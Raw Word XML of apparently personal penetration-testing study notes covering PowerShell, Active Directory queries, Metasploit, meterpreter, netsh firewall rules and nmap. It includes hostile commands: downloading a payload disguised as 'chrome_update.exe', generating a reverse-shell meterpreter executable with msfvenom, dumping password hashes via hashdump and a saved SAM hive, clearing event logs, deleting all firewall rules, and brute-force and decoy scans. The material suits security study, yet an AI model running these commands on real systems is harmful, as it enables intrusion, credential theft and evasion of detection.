    <w:p w14:paraId="7566321D" w14:textId="77777777" w:rsidR="00CC6C94" w:rsidRDefault="008E6B86"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Get-Process | Where-Object{$_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ProcessName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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-eq "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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lsass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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line of the process named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lsass</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the column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ProcessName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Get-Process | Where-Object{$_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ProcessName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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-eq "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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lsass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Select-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6B8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Name,Path</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extract only the properties name and path of the process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lsass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F0F7EB9" w14:textId="2DC7C0D2" w:rsidR="00B64404" w:rsidRDefault="00B64404" w:rsidP="00D372E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Get-AD… - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B6440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need to have the Active Directory module installed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6440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Relative Identifier (RID) is part of the security identifier (SID)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6440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r w:rsidRPr="00B6440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ADUser</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RID of the user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ADGroup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RID of the group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ADUser</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donna </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RID of the user donna</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372E2" w:rsidRP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r w:rsidR="00D372E2" w:rsidRP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ADUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D372E2" w:rsidRP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 * | Where-Object { $_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D372E2" w:rsidRP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SID.Value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D372E2" w:rsidRP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-match '-501$' }</w:t>
      </w:r>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all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ADUsers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D372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its find the one with RID 501</w:t>
      </w:r>
      <w:r w:rsidR="00E704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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E704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ADUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E704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 * -Properties </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E704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PasswordLastSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E704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shows the last time the password</w:t>
      </w:r>
      <w:r w:rsidR="009D4D4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w:t>
      </w:r>
      <w:r w:rsidR="00E704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w:t>
      </w:r>
      <w:r w:rsidR="00B01DE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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B01DE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ADComputer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B01DE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 * - show all the computers in the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969441C" w14:textId="77777777" w:rsidR="00CC6C94" w:rsidRDefault="00CC6C94"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Get-Service – get all the services and their status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EAC90" w14:textId="77777777" w:rsidR="00FE275B" w:rsidRDefault="00CC6C94"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Get-volume – get data on hard disks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6580D9" w14:textId="55A819DF" w:rsidR="00D85A07" w:rsidRDefault="00D85A07" w:rsidP="009775E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A0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Get-ExecutionPolicy</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my policy</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levels between restricted to </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bypass</w:t>
      </w:r>
      <w:r w:rsidR="001E4F2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 levels</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bypass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means every script can run</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does not even alert the user</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unrestricted means every script can run, but it d</w:t>
      </w:r>
      <w:r w:rsidR="003728B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oes prompt the user</w:t>
      </w:r>
      <w:r w:rsidR="005E628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1F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restricted means no scripts are allowed to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DF3F34" w14:textId="5C42A07C" w:rsidR="00495A6E" w:rsidRPr="00BB17D9" w:rsidRDefault="00495A6E" w:rsidP="00BB17D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WinEvent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-Path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log.evtx</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read event file</w:t>
      </w:r>
      <w:r w:rsidR="00BB17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the name of the event)</w:t>
      </w:r>
      <w:r w:rsidR="00BB17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Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BB17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WinEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BB17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-Path .\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BB17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log.evtx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BB17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Format-List – read the event file with the content of every event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564EB194" w14:textId="77777777" w:rsidR="00FE275B" w:rsidRDefault="00FE275B" w:rsidP="00FE27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Set-Location favorites – go inside favorites directory (similar to cd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F35FCAC" w14:textId="52F7AB2A" w:rsidR="00045548" w:rsidRPr="00045548" w:rsidRDefault="00045548" w:rsidP="0004554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5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Select-String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auth.log</w:t>
      </w:r>
      <w:r w:rsidRPr="000455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 140.206.157.242 | Measure-Object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counts the amount of times th</w:t>
      </w:r>
      <w:r w:rsidR="007B25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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B25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007B25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in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1917E50C" w14:textId="77777777" w:rsidR="00FE275B" w:rsidRDefault="00FE275B" w:rsidP="00FE27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Invoke-</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Webrequest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-Uri </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="001F3576">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http://10.10.10.10:1212/chrome_update.exe</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outfile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c:\users\...\chrome.exe – ask from the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 in port 1212 (the port need to be open already) the file chrome_update.exe and name it as chrome.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D74C44" w14:textId="77777777" w:rsidR="00061C0E" w:rsidRDefault="00A625A1" w:rsidP="00A625A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Ping 8.8.8.8 – check the connection with 8.8.8.8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Test-Connection -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRP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ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRP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8.8.8.8</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the connection, but return more info then ping</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roofErr w:type="spellStart"/>
      <w:r w:rsidRP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NetConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRP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ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRP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8.8.8.8</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return more info on the connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D235AB" w14:textId="20FDFCFF" w:rsidR="00FE275B" w:rsidRDefault="00061C0E" w:rsidP="000E615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C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Write-Host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61C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for displaying information directly to the console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 info with that command into a variable or file</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E6152" w:rsidRPr="008F37C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Write-Host "Hello"</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 hello</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Write-Output – print the data, also enable us to save the info inside a file or variable</w:t>
      </w:r>
      <w:r w:rsid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61C0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Write-Output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“hello</w:t>
      </w:r>
      <w:r w:rsidR="000E6152" w:rsidRP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Out-File "file.txt" </w:t>
      </w:r>
      <w:r w:rsidR="000E615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display hello, and also save it into a file</w:t>
      </w:r>
      <w:r w:rsid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625A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FE27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findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE27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hello – find string hello in a file</w:t>
      </w:r>
      <w:r w:rsidR="00FE27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FE27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findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE275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hello – ignoring case sensitive find the string hello in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D00C87" w14:textId="696EB14D" w:rsidR="00065E66" w:rsidRDefault="00065E66" w:rsidP="00065E6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5E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65E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ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00065E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65E6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SilentlyContinue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flag used in script to continue the script even if there is an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF06EAA" w14:textId="77777777" w:rsidR="00FE275B" w:rsidRPr="00FE275B" w:rsidRDefault="00FE275B" w:rsidP="00FE275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920229" w14:textId="1CBC72D2" w:rsidR="0072035A" w:rsidRDefault="00817295" w:rsidP="009C77E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4590F47" w14:textId="18C8794F" w:rsidR="003D0B21" w:rsidRPr="000C387E" w:rsidRDefault="003D0B21" w:rsidP="003D0B2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Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00614931">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614931">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Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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0CEDA82A" w14:textId="731A1108" w:rsidR="003D0B21" w:rsidRDefault="003D0B21"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msf6 – command line of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msfconsole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auxiliary – a piece of code with specific meaning such as connect in anonymous to ftp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payload – type of communication such as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reverse_tcp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bind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encoder – help us to hide the payload for we will not be detected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post exploitation – we will use that after we got a session, for get more date or improve the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7090412D" w14:textId="3C83476C" w:rsidR="006E5D31" w:rsidRDefault="00F06909"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type:auxiliary</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specific something we want to get and not exploit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search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type:exploit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scripts for exploits and get a session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search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type:post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scripts for upgrade sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A62CFF" w14:textId="53A7144F" w:rsidR="00460961" w:rsidRDefault="006E5D31" w:rsidP="0001024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8 – use one of the script in the list</w:t>
      </w:r>
      <w:r w:rsidR="004B74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info – will give me info on the option we choose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options – search which </w:t>
      </w:r>
      <w:r w:rsidR="00D1413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 to enter</w:t>
      </w:r>
      <w:r w:rsidR="00FF3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show payloads – show which payload we can choose</w:t>
      </w:r>
      <w:r w:rsidR="00FF3DB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set payload … - choose the payload</w:t>
      </w:r>
      <w:r w:rsidR="0009466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set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0009466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rhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0009466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define the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0009466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0009466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attack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run/exploit – run the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sript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0081729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run -j – run as job in the background, like when opening a port and waiting for the target to talk to us</w:t>
      </w:r>
      <w:r w:rsidR="0081729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jobs – show all the jobs in the background</w:t>
      </w:r>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bg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 save the session in the background so we can do other things as attack other hosts</w:t>
      </w:r>
      <w:r w:rsidR="002010E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 new sessions </w:t>
      </w:r>
      <w:r w:rsidR="002010E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3A0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upgrade the current sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6D5E7" w14:textId="11CAF6EE" w:rsidR="003D3CFF" w:rsidRDefault="00460961" w:rsidP="00D80B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shell to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meterpreter</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type:post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for upgrade the session</w:t>
      </w:r>
      <w:r w:rsidR="00E1274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sessions -u 2 – try to upgrade session 2</w:t>
      </w:r>
      <w:r w:rsidR="002D71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search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D71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shell_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D71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it is post exploitation, for upgrade the session</w:t>
      </w:r>
      <w:r w:rsidR="0004290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search suggester – suggest us what to use for upgrade the session</w:t>
      </w:r>
      <w:r w:rsidR="005C2B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E11E3E6" w14:textId="29BBC62F" w:rsidR="00D80B1B" w:rsidRDefault="00D80B1B" w:rsidP="00D80B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multi/handler – listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD19E71" w14:textId="6E1DD5D2" w:rsidR="00A74E5E" w:rsidRDefault="00A74E5E" w:rsidP="00D80B1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meterpreter</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r w:rsidR="008154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8154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getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008154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user 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getpid</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the current process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indentifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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list of the processes</w:t>
      </w:r>
      <w:r w:rsidR="003B1C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3B1C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sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B1C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data on the system such as hostname</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shell – we can use that to get a shell</w:t>
      </w:r>
      <w:r w:rsidR="002A672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2A672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hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A672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hashes of the passwords of the users</w:t>
      </w:r>
      <w:r w:rsidR="005033D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migrate -N svchost.exe – migrate to another process by its name to get privileged </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clearev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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clear the events log</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execute – execute a command</w:t>
      </w:r>
      <w:r w:rsidR="000102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reboot – reboot the computer</w:t>
      </w:r>
      <w:r w:rsidR="00AB08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AB08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pgrep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AB08C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string as grep command</w:t>
      </w:r>
      <w:r w:rsidR="002656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search -f accounts.txt – find a path to this file (similar to find command in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002656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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0026564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A15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reg save HKLM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA15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roofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA15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c:\sam.hiv – save the file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA15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sam.hiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA154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computer than you can download it from there</w:t>
      </w:r>
      <w:r w:rsidR="00930A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30A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download </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00930A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sam.hiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00930A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download this file to our machine</w:t>
      </w:r>
      <w:r w:rsidR="0002682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sudo samdump2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0002682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system.hiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0002682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2682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sam.hiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0002682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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0002682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secret_win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0002682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make </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0002682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hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0002682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the files </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0002682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system.hiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0002682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0002682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sam.hiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0002682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downloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5951C3AF" w14:textId="2F969620" w:rsidR="00614931" w:rsidRDefault="006C63AB"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msfvenom</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payloads | grep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meterpreter</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give a list of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meterpreter</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payloads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t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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=10.10.10.10 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0061493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=7878 -f exe &gt;&gt; file.exe – create payload and name it exe</w:t>
      </w:r>
      <w:r w:rsidR="00CD19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reverse payload so we need the target to turn this file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200AFB0E" w14:textId="05F76AAC" w:rsidR="00E34555" w:rsidRDefault="00E34555"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msfdb</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create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postgresql</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database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workspace – shows all the workspaces that exist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workspace -a hello – add new workspace called hello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workspace default – switch to the default workspace called default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hosts -c address – the flag -c behave as awk and find the address column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services -S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vsftpd</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behave as grep and search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vsftpd</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F32E7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db_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F32E7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10.10.10.10 -p 21 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F32E7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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F32E7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save the results to the DB of </w:t>
      </w:r>
      <w:r w:rsidR="001651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Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="001651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1651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db_export</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0016510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/path/file.xml – export the DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96E133" w14:textId="3E188790" w:rsidR="00FF42A0" w:rsidRDefault="00FF42A0"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auxiliary/admin/</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/ms17_010_command – auxiliary for exploit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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="225E4C7B" w14:textId="567EA552" w:rsidR="005C2B40" w:rsidRDefault="000D61EA"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command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powershell</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NetFirewallProfile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when we want to run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powershell</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 we need first to write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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27A46724" w14:textId="77777777" w:rsidR="0096541F" w:rsidRDefault="0096541F"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0BA6B" w14:textId="5A6F6A8A" w:rsidR="005C2B40" w:rsidRPr="000C387E" w:rsidRDefault="005C2B40" w:rsidP="005C2B40">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Firewall</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63771259" w14:textId="44A2A3F7" w:rsidR="005C2B40" w:rsidRPr="004456B5" w:rsidRDefault="002C1548" w:rsidP="006E5D3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netsh</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network shell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4E119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etsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E119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E119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advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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firewall show rule name=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ICMP_allow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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shows data on the predefined rule called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ICMP_allow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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firewall delete rule name=all – delete all the rules</w:t>
      </w:r>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netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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firewall add rule name = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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allow_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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action=allow </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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remoteip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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10.10.10.10 – allow incoming traffic from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>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netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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firewall add rule name=accept_443 protocol=TCP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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localport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009654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=80 action=allow – enable communication outside in port 80 in TCP protocol </w:t>
      </w:r>
      <w:r w:rsidR="00CD32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CD32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netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD32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D32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advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD32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firewall set rule name=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD32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Allow_ICMP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD32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D32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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD32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new action=block protocol=ICMPv4 – change exist rule (set command) to block ping</w:t>
      </w:r>
      <w:r w:rsidR="00E706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B6F8194" w14:textId="77777777" w:rsidR="001A6FC4" w:rsidRDefault="001A6FC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6C953D"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BE2328"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40BFE4"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D627D" w14:textId="77777777" w:rsidR="009C77E4"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61105" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="00892789" w:rsidRDefault="009C77E4" w:rsidP="00EB2E0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7248F1" w14:textId="77777777" w:rsidR="00502E69" w:rsidRPr="00502E69" w:rsidRDefault="00502E69" w:rsidP="0013683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9DF0B0" w14:textId="2137E2C5" w:rsidR="000C387E" w:rsidRPr="000C387E" w:rsidRDefault="000C387E" w:rsidP="000C387E">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Nmap</w:t>
      </w:r>
      <w:r w:rsidR="00D8498F">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D8498F">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Masscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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0208A4CE" w14:textId="189C453A" w:rsidR="00132564" w:rsidRPr="00132564" w:rsidRDefault="00296C76" w:rsidP="00BF783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 – scans the default 1000 ports on the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sudo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does not use ping before scanning the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assumes the destination exist, sometimes there are destinations that block ping, and the default for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that when it does not find the host is active It won’t search for open ports so we want to use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sudo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10.10.10.10 -p- - scans all the ports (</w:t>
      </w:r>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65,535</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sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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10.10.10.10 -F – scan the default 100 ports</w:t>
      </w:r>
      <w:r w:rsidR="00C00D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sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C00D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sidR="00C00D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10.10.10.10 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C00D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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C00D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scan service versions</w:t>
      </w:r>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sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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10.10.10.10 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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if the host is up</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t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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3389 – scan only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t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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3389,22,53 – scan few ports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4350B"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t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0074350B"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sidR="0074350B"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w:t>
      </w:r>
      <w:r w:rsidR="007435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20 - 100 – scan range of ports</w:t>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sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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10.10.10.10/24 – scan all the subnet</w:t>
      </w:r>
      <w:r w:rsidR="007435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3BEF"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t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E3BEF"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sidR="008E3BEF"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w:t>
      </w:r>
      <w:r w:rsidR="008E3BE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--open – shows in the output only open ports</w:t>
      </w:r>
      <w:r w:rsid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F7833" w:rsidRP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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF7833" w:rsidRP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vulners.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsid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must to come with -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsid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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsid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have the versions of the machine it scan, the script check the version of the services of the machine, and check if there is already known vulnerability by checking in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsid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00BF7833" w:rsidRP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ulners</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF7833" w:rsidRPr="00BF78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database</w:t>
      </w:r>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--script</w:t>
      </w:r>
      <w:r w:rsidR="00F806E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ftp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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anon.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006237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if anonymous is user in the target (in ftp)</w:t>
      </w:r>
      <w:r w:rsidR="009E75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E75D5"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--script=ftp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E75D5"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brute.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E75D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try connect to ftp using common and simple credentials</w:t>
      </w:r>
      <w:r w:rsidR="0039333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--script=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0039333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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0039333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39333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roofErr w:type="spellEnd"/>
      <w:r w:rsidR="0039333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-discovery – exploit the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0039333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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0039333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 to try to get data as hostname, operating system, domain name and more.</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32564" w:rsidRP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132564" w:rsidRP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32564" w:rsidRP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--script=default</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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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shorthand of </w:t>
      </w:r>
      <w:r w:rsidR="00132564" w:rsidRP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--script=default</w:t>
      </w:r>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tell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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run a default set of basic scripts of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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sidR="0013256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get info on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8D174" w14:textId="0E698B10" w:rsidR="003D0295" w:rsidRDefault="003E0EA2" w:rsidP="0013256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10.10.10.10 -p 80 -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–disable-</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 –packet-trace -D RND: 5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send syn packet without completing the 3-way handshake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 skip the host resolution which make the scanning faster</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–disable-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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disable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ping discovery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–packet-trace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shows all the packets sent and receive during the scanning</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RND:5</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using 5 decoys of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harden on the target to scan the real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scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C2DB64" w14:textId="4B6B9ED3" w:rsidR="00021236" w:rsidRDefault="0062373E" w:rsidP="003E0EA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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:r w:rsidR="009D0E1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-T3 – between 0-5 speed of scanning, when 5 you may lose packets and you are not stealth, and T0 is slow and more stealth.</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roofErr w:type="spellStart"/>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oG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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output greppable</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roofErr w:type="spellStart"/>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spellEnd"/>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output normal</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roofErr w:type="spellStart"/>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oX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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output XML (the only output provide the most info)</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373A"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E373A"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sidR="008E373A" w:rsidRPr="00296C7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373A" w:rsidRP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E373A" w:rsidRP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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:r w:rsidR="008E373A" w:rsidRP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E373A" w:rsidRP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oG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E373A" w:rsidRP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output-file.txt</w:t>
      </w:r>
      <w:r w:rsidR="008E373A">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save in greppable format to text file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0ACCFB" w14:textId="01C2EE41" w:rsidR="00021236" w:rsidRDefault="006B420E"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 scan the ports by its order and not random</w:t>
      </w:r>
      <w:r w:rsidR="003643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-O – find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0036430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roofErr w:type="spellEnd"/>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 – specify </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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standard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>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 – for file of</w:t>
      </w:r>
      <w:r w:rsidR="0005505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of</w:t>
      </w:r>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00407D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attack</w:t>
      </w:r>
      <w:r w:rsidR="00A01C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 – specify to stop attack after found right credentials</w:t>
      </w:r>
      <w:r w:rsidR="00A01C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 4 – specify the amount of attacks parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099DC988" w14:textId="06D25D07" w:rsidR="00D8498F" w:rsidRPr="00D8498F" w:rsidRDefault="00D8498F" w:rsidP="00D8498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timeout 30 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 | grep open | awk '{for (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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spellStart"/>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&lt;=NF; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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 ", $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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print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limit the scan for 30 seconds, show only from column 4 to the last column</w:t>
